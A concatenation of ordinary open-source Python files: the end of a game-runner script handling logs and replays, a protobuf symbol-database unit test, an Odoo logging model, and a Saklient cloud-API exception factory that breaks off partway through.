engine_options['error_logs'] = [Tee(Comment(stderr), open(os.path.join(opts.log_dir, '{0}.bot{1}.error'.format(game_id, i)), 'w'))
for i in range(bot_count)]
else:
engine_options['error_logs'] = [Tee(stderr, open(os.path.join(opts.log_dir, '{0}.bot{1}.error'.format(game_id, i)), 'w'))
for i in range(bot_count)]
else:
engine_options['error_logs'] = [open(os.path.join(opts.log_dir, '{0}.bot{1}.error'.format(game_id, i)), 'w')
for i in range(bot_count)]
elif opts.log_stderr:
if opts.log_stdout:
engine_options['error_logs'] = [Comment(stderr)] * bot_count
else:
engine_options['error_logs'] = [stderr] * bot_count
else:
engine_options['error_logs'] = None
if opts.verbose:
if opts.log_stdout:
engine_options['verbose_log'] = Comment(sys.stdout)
else:
engine_options['verbose_log'] = sys.stdout
engine_options['game_id'] = game_id
if opts.rounds > 1:
print('# playgame round {0}, game id {1}'.format(round, game_id))
# intercept replay log so we can add player names
if opts.log_replay:
intcpt_replay_io = StringIO()
real_replay_io = engine_options['replay_log']
engine_options['replay_log'] = intcpt_replay_io
result = run_game(game, bots, engine_options)
# add player names, write to proper io, reset back to normal
if opts.log_replay:
replay_json = json.loads(intcpt_replay_io.getvalue())
replay_json['playernames'] = [get_cmd_name(arg) for arg in args]
real_replay_io.write(json.dumps(replay_json))
intcpt_replay_io.close()
engine_options['replay_log'] = real_replay_io
# close file descriptors
if engine_options['stream_log']:
engine_options['stream_log'].close()
if engine_options['replay_log']:
engine_options['replay_log'].close()
if engine_options['input_logs']:
for input_log in engine_options['input_logs']:
input_log.close()
if engine_options['output_logs']:
for output_log in engine_options['output_logs']:
output_log.close()
if engine_options['error_logs']:
for error_log in engine_options['error_logs']:
error_log.close()
if replay_path:
if opts.nolaunch:
if opts.html_file:
visualizer.visualize_locally.launch(replay_path, True, opts.html_file)
else:
if opts.html_file == None:
visualizer.visualize_locally.launch(replay_path,
generated_path="replay.{0}.html".format(game_id))
else:
visualizer.visualize_locally.launch(replay_path,
generated_path=opts.html_file)
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
| gpl-2.0 |
jjas0nn/solvem | tensorflow/lib/python2.7/site-packages/google/protobuf/internal/symbol_database_test.py | 43 | 5386 | #! /usr/bin/env python
#
# Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for google.protobuf.symbol_database."""
try:
import unittest2 as unittest #PY26
except ImportError:
import unittest
from google.protobuf import unittest_pb2
from google.protobuf import descriptor
from google.protobuf import descriptor_pool
from google.protobuf import symbol_database
class SymbolDatabaseTest(unittest.TestCase):
def _Database(self):
if descriptor._USE_C_DESCRIPTORS:
# The C++ implementation does not allow mixing descriptors from
# different pools.
db = symbol_database.SymbolDatabase(pool=descriptor_pool.Default())
else:
db = symbol_database.SymbolDatabase()
# Register representative types from unittest_pb2.
db.RegisterFileDescriptor(unittest_pb2.DESCRIPTOR)
db.RegisterMessage(unittest_pb2.TestAllTypes)
db.RegisterMessage(unittest_pb2.TestAllTypes.NestedMessage)
db.RegisterMessage(unittest_pb2.TestAllTypes.OptionalGroup)
db.RegisterMessage(unittest_pb2.TestAllTypes.RepeatedGroup)
db.RegisterEnumDescriptor(unittest_pb2.ForeignEnum.DESCRIPTOR)
db.RegisterEnumDescriptor(unittest_pb2.TestAllTypes.NestedEnum.DESCRIPTOR)
return db
def testGetPrototype(self):
instance = self._Database().GetPrototype(
unittest_pb2.TestAllTypes.DESCRIPTOR)
self.assertTrue(instance is unittest_pb2.TestAllTypes)
def testGetMessages(self):
messages = self._Database().GetMessages(
['google/protobuf/unittest.proto'])
self.assertTrue(
unittest_pb2.TestAllTypes is
messages['protobuf_unittest.TestAllTypes'])
def testGetSymbol(self):
self.assertEqual(
unittest_pb2.TestAllTypes, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes'))
self.assertEqual(
unittest_pb2.TestAllTypes.NestedMessage, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes.NestedMessage'))
self.assertEqual(
unittest_pb2.TestAllTypes.OptionalGroup, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes.OptionalGroup'))
self.assertEqual(
unittest_pb2.TestAllTypes.RepeatedGroup, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes.RepeatedGroup'))
def testEnums(self):
# Check registration of types in the pool.
self.assertEqual(
'protobuf_unittest.ForeignEnum',
self._Database().pool.FindEnumTypeByName(
'protobuf_unittest.ForeignEnum').full_name)
self.assertEqual(
'protobuf_unittest.TestAllTypes.NestedEnum',
self._Database().pool.FindEnumTypeByName(
'protobuf_unittest.TestAllTypes.NestedEnum').full_name)
def testFindMessageTypeByName(self):
self.assertEqual(
'protobuf_unittest.TestAllTypes',
self._Database().pool.FindMessageTypeByName(
'protobuf_unittest.TestAllTypes').full_name)
self.assertEqual(
'protobuf_unittest.TestAllTypes.NestedMessage',
self._Database().pool.FindMessageTypeByName(
'protobuf_unittest.TestAllTypes.NestedMessage').full_name)
def testFindFindContainingSymbol(self):
# Lookup based on either enum or message.
self.assertEqual(
'google/protobuf/unittest.proto',
self._Database().pool.FindFileContainingSymbol(
'protobuf_unittest.TestAllTypes.NestedEnum').name)
self.assertEqual(
'google/protobuf/unittest.proto',
self._Database().pool.FindFileContainingSymbol(
'protobuf_unittest.TestAllTypes').name)
def testFindFileByName(self):
self.assertEqual(
'google/protobuf/unittest.proto',
self._Database().pool.FindFileByName(
'google/protobuf/unittest.proto').name)
if __name__ == '__main__':
unittest.main()
| mit |
Nowheresly/odoo | openerp/addons/base/ir/ir_logging.py | 326 | 1882 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014 OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from openerp.osv import osv, fields
from openerp.tools.translate import _
class ir_logging(osv.Model):
_name = 'ir.logging'
_order = 'id DESC'
EXCEPTIONS_TYPE = [
('client', 'Client'),
('server', 'Server')
]
_columns = {
'create_date': fields.datetime('Create Date', readonly=True),
'create_uid': fields.integer('Uid', readonly=True), # Integer not m2o is intentionnal
'name': fields.char('Name', required=True),
'type': fields.selection(EXCEPTIONS_TYPE, string='Type', required=True, select=True),
'dbname': fields.char('Database Name', select=True),
'level': fields.char('Level', select=True),
'message': fields.text('Message', required=True),
'path': fields.char('Path', required=True),
'func': fields.char('Function', required=True),
'line': fields.char('Line', required=True),
}
| agpl-3.0 |
sakura-internet/saklient.python | saklient/errors/exceptionfactory.py | 1 | 32200 | # -*- coding:utf-8 -*-
# This code is automatically transpiled by Saklient Translator
import six
from .httpexception import HttpException
from .httpbadgatewayexception import HttpBadGatewayException
from .httpbadrequestexception import HttpBadRequestException
from .httpconflictexception import HttpConflictException
from .httpexpectationfailedexception import HttpExpectationFailedException
from .httpfaileddependencyexception import HttpFailedDependencyException
from .httpforbiddenexception import HttpForbiddenException
from .httpgatewaytimeoutexception import HttpGatewayTimeoutException
from .httpgoneexception import HttpGoneException
from .httphttpversionnotsupportedexception import HttpHttpVersionNotSupportedException
from .httpinsufficientstorageexception import HttpInsufficientStorageException
from .httpinternalservererrorexception import HttpInternalServerErrorException
from .httplengthrequiredexception import HttpLengthRequiredException
from .httplockedexception import HttpLockedException
from .httpmethodnotallowedexception import HttpMethodNotAllowedException
from .httpnotacceptableexception import HttpNotAcceptableException
from .httpnotextendedexception import HttpNotExtendedException
from .httpnotfoundexception import HttpNotFoundException
from .httpnotimplementedexception import HttpNotImplementedException
from .httppaymentrequiredexception import HttpPaymentRequiredException
from .httppreconditionfailedexception import HttpPreconditionFailedException
from .httpproxyauthenticationrequiredexception import HttpProxyAuthenticationRequiredException
from .httprequestentitytoolargeexception import HttpRequestEntityTooLargeException
from .httprequesttimeoutexception import HttpRequestTimeoutException
from .httprequesturitoolongexception import HttpRequestUriTooLongException
from .httprequestedrangenotsatisfiableexception import HttpRequestedRangeNotSatisfiableException
from .httpserviceunavailableexception import HttpServiceUnavailableException
from .httpunauthorizedexception import HttpUnauthorizedException
from .httpunprocessableentityexception import HttpUnprocessableEntityException
from .httpunsupportedmediatypeexception import HttpUnsupportedMediaTypeException
from .httpupgraderequiredexception import HttpUpgradeRequiredException
from .httpvariantalsonegotiatesexception import HttpVariantAlsoNegotiatesException
from ..cloud.errors.accessapikeydisabledexception import AccessApiKeyDisabledException
from ..cloud.errors.accesssakuraexception import AccessSakuraException
from ..cloud.errors.accessstaffexception import AccessStaffException
from ..cloud.errors.accesstokenexception import AccessTokenException
from ..cloud.errors.accessxhrorapikeyexception import AccessXhrOrApiKeyException
from ..cloud.errors.accountnotfoundexception import AccountNotFoundException
from ..cloud.errors.accountnotspecifiedexception import AccountNotSpecifiedException
from ..cloud.errors.ambiguousidentifierexception import AmbiguousIdentifierException
from ..cloud.errors.ambiguouszoneexception import AmbiguousZoneException
from ..cloud.errors.apiproxytimeoutexception import ApiProxyTimeoutException
from ..cloud.errors.apiproxytimeoutnongetexception import ApiProxyTimeoutNonGetException
from ..cloud.errors.archiveisincompleteexception import ArchiveIsIncompleteException
from ..cloud.errors.bootfailurebylockexception import BootFailureByLockException
from ..cloud.errors.bootfailureingroupexception import BootFailureInGroupException
from ..cloud.errors.busyexception import BusyException
from ..cloud.errors.cantresizesmallerexception import CantResizeSmallerException
from ..cloud.errors.cdromdevicelockedexception import CdromDeviceLockedException
from ..cloud.errors.cdromdisabledexception import CdromDisabledException
from ..cloud.errors.cdrominuseexception import CdromInUseException
from ..cloud.errors.cdromisincompleteexception import CdromIsIncompleteException
from ..cloud.errors.connecttosameswitchexception import ConnectToSameSwitchException
from ..cloud.errors.contractcreationexception import ContractCreationException
from ..cloud.errors.copytoitselfexception import CopyToItselfException
from ..cloud.errors.deletediskb4templateexception import DeleteDiskB4TemplateException
from ..cloud.errors.deleteipv6netsfirstexception import DeleteIpV6NetsFirstException
from ..cloud.errors.deleteresb4accountexception import DeleteResB4AccountException
from ..cloud.errors.deleterouterb4switchexception import DeleteRouterB4SwitchException
from ..cloud.errors.deletestaticroutefirstexception import DeleteStaticRouteFirstException
from ..cloud.errors.disabledinsandboxexception import DisabledInSandboxException
from ..cloud.errors.disconnectb4deleteexception import DisconnectB4DeleteException
from ..cloud.errors.disconnectb4updateexception import DisconnectB4UpdateException
from ..cloud.errors.diskconnectionlimitexception import DiskConnectionLimitException
from ..cloud.errors.diskiscopyingexception import DiskIsCopyingException
from ..cloud.errors.diskisnotavailableexception import DiskIsNotAvailableException
from ..cloud.errors.disklicensemismatchexception import DiskLicenseMismatchException
from ..cloud.errors.diskorssinmigrationexception import DiskOrSsInMigrationException
from ..cloud.errors.diskstockrunoutexception import DiskStockRunOutException
from ..cloud.errors.dnsarecordnotfoundexception import DnsARecordNotFoundException
from ..cloud.errors.dnsaaaarecordnotfoundexception import DnsAaaaRecordNotFoundException
from ..cloud.errors.dnsptrupdatefailureexception import DnsPtrUpdateFailureException
from ..cloud.errors.dontcreateinsandboxexception import DontCreateInSandboxException
from ..cloud.errors.duplicateaccountcodeexception import DuplicateAccountCodeException
from ..cloud.errors.duplicateentryexception import DuplicateEntryException
from ..cloud.errors.duplicateusercodeexception import DuplicateUserCodeException
from ..cloud.errors.filenotuploadedexception import FileNotUploadedException
from ..cloud.errors.filterarraycomparisonexception import FilterArrayComparisonException
from ..cloud.errors.filterbadoperatorexception import FilterBadOperatorException
from ..cloud.errors.filternullcomparisonexception import FilterNullComparisonException
from ..cloud.errors.filterunknownoperatorexception import FilterUnknownOperatorException
from ..cloud.errors.ftpcannotcloseexception import FtpCannotCloseException
from ..cloud.errors.ftpisalreadycloseexception import FtpIsAlreadyCloseException
from ..cloud.errors.ftpisalreadyopenexception import FtpIsAlreadyOpenException
from ..cloud.errors.ftpmustbeclosedexception import FtpMustBeClosedException
from ..cloud.errors.hostoperationfailureexception import HostOperationFailureException
from ..cloud.errors.illegaldasusageexception import IllegalDasUsageException
from ..cloud.errors.inmigrationexception import InMigrationException
from ..cloud.errors.invalidformatexception import InvalidFormatException
from ..cloud.errors.invalidparamcombexception import InvalidParamCombException
from ..cloud.errors.invalidrangeexception import InvalidRangeException
from ..cloud.errors.invaliduriargumentexception import InvalidUriArgumentException
from ..cloud.errors.ipv6netalreadyattachedexception import IpV6NetAlreadyAttachedException
from ..cloud.errors.limitcountinaccountexception import LimitCountInAccountException
from ..cloud.errors.limitcountinmemberexception import LimitCountInMemberException
from ..cloud.errors.limitcountinnetworkexception import LimitCountInNetworkException
from ..cloud.errors.limitcountinrouterexception import LimitCountInRouterException
from ..cloud.errors.limitcountinzoneexception import LimitCountInZoneException
from ..cloud.errors.limitmemoryinaccountexception import LimitMemoryInAccountException
from ..cloud.errors.limitsizeinaccountexception import LimitSizeInAccountException
from ..cloud.errors.missingisoimageexception import MissingIsoImageException
from ..cloud.errors.missingparamexception import MissingParamException
from ..cloud.errors.mustbeofsamezoneexception import MustBeOfSameZoneException
from ..cloud.errors.nodisplayresponseexception import NoDisplayResponseException
from ..cloud.errors.notforrouterexception import NotForRouterException
from ..cloud.errors.notreplicatingexception import NotReplicatingException
from ..cloud.errors.notwithhybridconnexception import NotWithHybridconnException
from ..cloud.errors.oldstorageplanexception import OldStoragePlanException
from ..cloud.errors.operationfailureexception import OperationFailureException
from ..cloud.errors.operationtimeoutexception import OperationTimeoutException
from ..cloud.errors.originalhashmismatchexception import OriginalHashMismatchException
from ..cloud.errors.packetfilterapplyingexception import PacketFilterApplyingException
from ..cloud.errors.packetfilterversionmismatchexception import PacketFilterVersionMismatchException
from ..cloud.errors.paramipnotfoundexception import ParamIpNotFoundException
from ..cloud.errors.paramresnotfoundexception import ParamResNotFoundException
from ..cloud.errors.paymentcreditcardexception import PaymentCreditCardException
from ..cloud.errors.paymentpaymentexception import PaymentPaymentException
from ..cloud.errors.paymentregistrationexception import PaymentRegistrationException
from ..cloud.errors.paymenttelcertificationexception import PaymentTelCertificationException
from ..cloud.errors.paymentunpayableexception import PaymentUnpayableException
from ..cloud.errors.penaltyoperationexception import PenaltyOperationException
from ..cloud.errors.replicaalreadyexistsexception import ReplicaAlreadyExistsException
from ..cloud.errors.replicanotfoundexception import ReplicaNotFoundException
from ..cloud.errors.resalreadyconnectedexception import ResAlreadyConnectedException
from ..cloud.errors.resalreadydisconnectedexception import ResAlreadyDisconnectedException
from ..cloud.errors.resalreadyexistsexception import ResAlreadyExistsException
from ..cloud.errors.resusedinzoneexception import ResUsedInZoneException
from ..cloud.errors.resourcepathnotfoundexception import ResourcePathNotFoundException
from ..cloud.errors.runoutofipaddressexception import RunOutOfIpAddressException
from ..cloud.errors.samelicenserequiredexception import SameLicenseRequiredException
from ..cloud.errors.servercouldnotstopexception import ServerCouldNotStopException
from ..cloud.errors.serveriscleaningexception import ServerIsCleaningException
from ..cloud.errors.serveroperationfailureexception import ServerOperationFailureException
from ..cloud.errors.serverpowermustbedownexception import ServerPowerMustBeDownException
from ..cloud.errors.serverpowermustbeupexception import ServerPowerMustBeUpException
from ..cloud.errors.servicetemporarilyunavailableexception import ServiceTemporarilyUnavailableException
from ..cloud.errors.sizemismatchexception import SizeMismatchException
from ..cloud.errors.snapshotinmigrationexception import SnapshotInMigrationException
from ..cloud.errors.stillcreatingexception import StillCreatingException
from ..cloud.errors.storageabnormalexception import StorageAbnormalException
from ..cloud.errors.storageoperationfailureexception import StorageOperationFailureException
from ..cloud.errors.switchhybridconnectedexception import SwitchHybridConnectedException
from ..cloud.errors.templateftpisopenexception import TemplateFtpIsOpenException
from ..cloud.errors.templateisincompleteexception import TemplateIsIncompleteException
from ..cloud.errors.toomanyrequestexception import TooManyRequestException
from ..cloud.errors.unknownexception import UnknownException
from ..cloud.errors.unknownostypeexception import UnknownOsTypeException
from ..cloud.errors.unsupportedresclassexception import UnsupportedResClassException
from ..cloud.errors.usernotspecifiedexception import UserNotSpecifiedException
from ..cloud.errors.vncproxyrequestfailureexception import VncProxyRequestFailureException
from ..util import Util
import saklient
str = six.text_type
# module saklient.errors.exceptionfactory
class ExceptionFactory(object):
## @static
# @param {int} status
# @param {str} code=None
# @param {str} message=""
# @return {saklient.errors.httpexception.HttpException}
@staticmethod
def create(status, code=None, message=""):
if code == "access_apikey_disabled":
return AccessApiKeyDisabledException(status, code, message)
elif code == "access_sakura":
return AccessSakuraException(status, code, message)
elif code == "access_staff":
return AccessStaffException(status, code, message)
elif code == "access_token":
return AccessTokenException(status, code, message)
elif code == "access_xhr_or_apikey":
return AccessXhrOrApiKeyException(status, code, message)
elif code == "account_not_found":
return AccountNotFoundException(status, code, message)
elif code == "account_not_specified":
return AccountNotSpecifiedException(status, code, message)
elif code == "ambiguous_identifier":
return AmbiguousIdentifierException(status, code, message)
elif code == "ambiguous_zone":
return AmbiguousZoneException(status, code, message)
elif code == "apiproxy_timeout":
return ApiProxyTimeoutException(status, code, message)
elif code == "apiproxy_timeout_non_get":
return ApiProxyTimeoutNonGetException(status, code, message)
elif code == "archive_is_incomplete":
return ArchiveIsIncompleteException(status, code, message)
elif code == "bad_gateway":
return HttpBadGatewayException(status, code, message)
elif code == "bad_request":
return HttpBadRequestException(status, code, message)
elif code == "boot_failure_by_lock":
return BootFailureByLockException(status, code, message)
elif code == "boot_failure_in_group":
return BootFailureInGroupException(status, code, message)
elif code == "busy":
return BusyException(status, code, message)
elif code == "cant_resize_smaller":
return CantResizeSmallerException(status, code, message)
elif code == "cdrom_device_locked":
return CdromDeviceLockedException(status, code, message)
elif code == "cdrom_disabled":
return CdromDisabledException(status, code, message)
elif code == "cdrom_in_use":
return CdromInUseException(status, code, message)
elif code == "cdrom_is_incomplete":
return CdromIsIncompleteException(status, code, message)
elif code == "conflict":
return HttpConflictException(status, code, message)
elif code == "connect_to_same_switch":
return ConnectToSameSwitchException(status, code, message)
elif code == "contract_creation":
return ContractCreationException(status, code, message)
elif code == "copy_to_itself":
return CopyToItselfException(status, code, message)
elif code == "delete_disk_b4_template":
return DeleteDiskB4TemplateException(status, code, message)
elif code == "delete_ipv6nets_first":
return DeleteIpV6NetsFirstException(status, code, message)
elif code == "delete_res_b4_account":
return DeleteResB4AccountException(status, code, message)
elif code == "delete_router_b4_switch":
return DeleteRouterB4SwitchException(status, code, message)
elif code == "delete_static_route_first":
return DeleteStaticRouteFirstException(status, code, message)
elif code == "disabled_in_sandbox":
return DisabledInSandboxException(status, code, message)
elif code == "disconnect_b4_delete":
return DisconnectB4DeleteException(status, code, message)
elif code == "disconnect_b4_update":
return DisconnectB4UpdateException(status, code, message)
elif code == "disk_connection_limit":
return DiskConnectionLimitException(status, code, message)
elif code == "disk_is_copying":
return DiskIsCopyingException(status, code, message)
elif code == "disk_is_not_available":
return DiskIsNotAvailableException(status, code, message)
elif code == "disk_license_mismatch":
return DiskLicenseMismatchException(status, code, message)
elif code == "disk_stock_run_out":
return DiskStockRunOutException(status, code, message)
elif code == "diskorss_in_migration":
return DiskOrSsInMigrationException(status, code, message)
elif code == "dns_a_record_not_found":
return DnsARecordNotFoundException(status, code, message)
elif code == "dns_aaaa_record_not_found":
return DnsAaaaRecordNotFoundException(status, code, message)
elif code == "dns_ptr_update_failure":
return DnsPtrUpdateFailureException(status, code, message)
elif code == "dont_create_in_sandbox":
return DontCreateInSandboxException(status, code, message)
elif code == "duplicate_account_code":
return DuplicateAccountCodeException(status, code, message)
elif code == "duplicate_entry":
return DuplicateEntryException(status, code, message)
elif code == "duplicate_user_code":
return DuplicateUserCodeException(status, code, message)
elif code == "expectation_failed":
return HttpExpectationFailedException(status, code, message)
elif code == "failed_dependency":
return HttpFailedDependencyException(status, code, message)
elif code == "file_not_uploaded":
return FileNotUploadedException(status, code, message)
elif code == "filter_array_comparison":
return FilterArrayComparisonException(status, code, message)
elif code == "filter_bad_operator":
return FilterBadOperatorException(status, code, message)
elif code == "filter_null_comparison":
return FilterNullComparisonException(status, code, message)
elif code == "filter_unknown_operator":
return FilterUnknownOperatorException(status, code, message)
elif code == "forbidden":
return HttpForbiddenException(status, code, message)
elif code == "ftp_cannot_close":
return FtpCannotCloseException(status, code, message)
elif code == "ftp_is_already_close":
return FtpIsAlreadyCloseException(status, code, message)
elif code == "ftp_is_already_open":
return FtpIsAlreadyOpenException(status, code, message)
elif code == "ftp_must_be_closed":
return FtpMustBeClosedException(status, code, message)
elif code == "gateway_timeout":
return HttpGatewayTimeoutException(status, code, message)
elif code == "gone":
return HttpGoneException(status, code, message)
elif code == "host_operation_failure":
return HostOperationFailureException(status, code, message)
elif code == "http_version_not_supported":
return HttpHttpVersionNotSupportedException(status, code, message)
elif code == "illegal_das_usage":
return IllegalDasUsageException(status, code, message)
elif code == "in_migration":
return InMigrationException(status, code, message)
elif code == "insufficient_storage":
return HttpInsufficientStorageException(status, code, message)
elif code == "internal_server_error":
return HttpInternalServerErrorException(status, code, message)
elif code == "invalid_format":
return InvalidFormatException(status, code, message)
elif code == "invalid_param_comb":
return InvalidParamCombException(status, code, message)
elif code == "invalid_range":
return InvalidRangeException(status, code, message)
elif code == "invalid_uri_argument":
return InvalidUriArgumentException(status, code, message)
elif code == "ipv6net_already_attached":
return IpV6NetAlreadyAttachedException(status, code, message)
elif code == "length_required":
return HttpLengthRequiredException(status, code, message)
elif code == "limit_count_in_account":
return LimitCountInAccountException(status, code, message)
elif code == "limit_count_in_member":
return LimitCountInMemberException(status, code, message)
elif code == "limit_count_in_network":
return LimitCountInNetworkException(status, code, message)
elif code == "limit_count_in_router":
return LimitCountInRouterException(status, code, message)
elif code == "limit_count_in_zone":
return LimitCountInZoneException(status, code, message)
elif code == "limit_memory_in_account":
return LimitMemoryInAccountException(status, code, message)
elif code == "limit_size_in_account":
return LimitSizeInAccountException(status, code, message)
elif code == "locked":
return HttpLockedException(status, code, message)
elif code == "method_not_allowed":
return HttpMethodNotAllowedException(status, code, message)
elif code == "missing_iso_image":
return MissingIsoImageException(status, code, message)
elif code == "missing_param":
return MissingParamException(status, code, message)
elif code == "must_be_of_same_zone":
return MustBeOfSameZoneException(status, code, message)
elif code == "no_display_response":
return NoDisplayResponseException(status, code, message)
elif code == "not_acceptable":
return HttpNotAcceptableException(status, code, message)
elif code == "not_extended":
return HttpNotExtendedException(status, code, message)
elif code == "not_for_router":
return NotForRouterException(status, code, message)
elif code == "not_found":
return HttpNotFoundException(status, code, message)
elif code == "not_implemented":
return HttpNotImplementedException(status, code, message)
elif code == "not_replicating":
return NotReplicatingException(status, code, message)
elif code == "not_with_hybridconn":
return NotWithHybridconnException(status, code, message)
elif code == "old_storage_plan":
return OldStoragePlanException(status, code, message)
elif code == "operation_failure":
return OperationFailureException(status, code, message)
elif code == "operation_timeout":
return OperationTimeoutException(status, code, message)
elif code == "original_hash_mismatch":
return OriginalHashMismatchException(status, code, message)
elif code == "packetfilter_applying":
return PacketFilterApplyingException(status, code, message)
elif code == "packetfilter_version_mismatch":
return PacketFilterVersionMismatchException(status, code, message)
elif code == "param_ip_not_found":
return ParamIpNotFoundException(status, code, message)
elif code == "param_res_not_found":
return ParamResNotFoundException(status, code, message)
elif code == "payment_creditcard":
return PaymentCreditCardException(status, code, message)
elif code == "payment_payment":
return PaymentPaymentException(status, code, message)
elif code == "payment_registration":
return PaymentRegistrationException(status, code, message)
elif code == "payment_required":
return HttpPaymentRequiredException(status, code, message)
elif code == "payment_telcertification":
return PaymentTelCertificationException(status, code, message)
elif code == "payment_unpayable":
return PaymentUnpayableException(status, code, message)
elif code == "penalty_operation":
return PenaltyOperationException(status, code, message)
elif code == "precondition_failed":
return HttpPreconditionFailedException(status, code, message)
elif code == "proxy_authentication_required":
return HttpProxyAuthenticationRequiredException(status, code, message)
elif code == "replica_already_exists":
return ReplicaAlreadyExistsException(status, code, message)
elif code == "replica_not_found":
return ReplicaNotFoundException(status, code, message)
elif code == "request_entity_too_large":
return HttpRequestEntityTooLargeException(status, code, message)
elif code == "request_timeout":
return HttpRequestTimeoutException(status, code, message)
elif code == "request_uri_too_long":
return HttpRequestUriTooLongException(status, code, message)
elif code == "requested_range_not_satisfiable":
return HttpRequestedRangeNotSatisfiableException(status, code, message)
elif code == "res_already_connected":
return ResAlreadyConnectedException(status, code, message)
elif code == "res_already_disconnected":
return ResAlreadyDisconnectedException(status, code, message)
elif code == "res_already_exists":
return ResAlreadyExistsException(status, code, message)
elif code == "res_used_in_zone":
return ResUsedInZoneException(status, code, message)
elif code == "resource_path_not_found":
return ResourcePathNotFoundException(status, code, message)
elif code == "run_out_of_ipaddress":
return RunOutOfIpAddressException(status, code, message)
elif code == "same_license_required":
return SameLicenseRequiredException(status, code, message)
elif code == "server_could_not_stop":
return ServerCouldNotStopException(status, code, message)
elif code == "server_is_cleaning":
return ServerIsCleaningException(status, code, message)
elif code == "server_operation_failure":
return ServerOperationFailureException(status, code, message)
elif code == "server_power_must_be_down":
return ServerPowerMustBeDownException(status, code, message)
elif code == "server_power_must_be_up":
return ServerPowerMustBeUpException(status, code, message)
elif code == "service_temporarily_unavailable":
return ServiceTemporarilyUnavailableException(status, code, message)
elif code == "service_unavailable":
return HttpServiceUnavailableException(status, code, message)
elif code == "size_mismatch":
return SizeMismatchException(status, code, message)
elif code == "snapshot_in_migration":
return SnapshotInMigrationException(status, code, message)
elif code == "still_creating":
return StillCreatingException(status, code, message)
elif code == "storage_abnormal":
return StorageAbnormalException(status, code, message)
elif code == "storage_operation_failure":
return StorageOperationFailureException(status, code, message)
elif code == "switch_hybrid_connected":
return SwitchHybridConnectedException(status, code, message)
elif code == "template_ftp_is_open":
return TemplateFtpIsOpenException(status, code, message)
elif code == "template_is_incomplete":
return TemplateIsIncompleteException(status, code, message)
elif code == "too_many_request":
return TooManyRequestException(status, code, message)
elif code == "unauthorized":
return HttpUnauthorizedException(status, code, message)
elif code == "unknown":
return UnknownException(status, code, message)
elif code == "unknown_os_type":
return UnknownOsTypeException(status, code, message)
elif code == "unprocessable_entity":
return HttpUnprocessableEntityException(status, code, message)
elif code == "unsupported_media_type":
return HttpUnsupportedMediaTypeException(status, code, message)
elif code == "unsupported_res_class":
return UnsupportedResClassException(status, code, message)
elif code == "upgrade_required":
return HttpUpgradeRequiredException(status, code, message)
elif code == "user_not_specified":
return UserNotSpecifiedException(status, code, message)
elif code == "variant_also_negotiates":
return HttpVariantAlsoNegotiatesException(status, code, message)
elif code == "vnc_proxy_request_failure":
return VncProxyRequestFailureException(status, code, message)
if status == 400:
return HttpBadRequestException(status, code, message)
elif status == 401:
return HttpUnauthorizedException(status, code, message)
elif status == 402:
return HttpPaymentRequiredException(status, code, message)
elif status == 403:
return HttpForbiddenException(status, code, message)
elif status == 404:
return HttpNotFoundException(status, code, message)
elif status == 405:
return HttpMethodNotAllowedException(status, code, message)
elif status == 406:
return HttpNotAcceptableException(status, code, message)
elif status == 407:
return HttpProxyAuthenticationRequiredException(status, code, message)
elif status == 408:
return HttpRequestTimeoutException(status, code, message)
elif status == 409:
return HttpConflictException(status, code, message)
elif status == 410:
return HttpGoneException(status, code, message)
elif status == 411:
return HttpLengthRequiredException(status, code, message)
elif status == 412:
return HttpPreconditionFailedException(status, code, message)
elif status == 413:
return HttpRequestEntityTooLargeException(status, code, message)
elif status == 415:
return HttpUnsupportedMediaTypeException(status, code, message)
elif status == 416:
return HttpRequestedRangeNotSatisfiableException(status, code, message)
elif status == 417:
return HttpExpectationFailedException(status, code, message)
elif status == 422:
return HttpUnprocessableEntityException(status, code, message)
elif status == 423:
return HttpLockedException(status, code, message)
elif status == 424:
return HttpFailedDependencyException(status, code, message)
elif status == 426:
return HttpUpgradeRequiredException(status, code, message)
elif status == 500:
return HttpRequestUriTooLongException(status, code, message)
elif status == 501:
return HttpNotImplementedException(status, code, message)
elif status == 502:
return HttpBadGatewayException(status, code, message)
elif status == 503:
return HttpServiceUnavailableException(status, code, message)
elif status == 504:
return HttpGatewayTimeoutException(status, code, message)
elif status == 505:
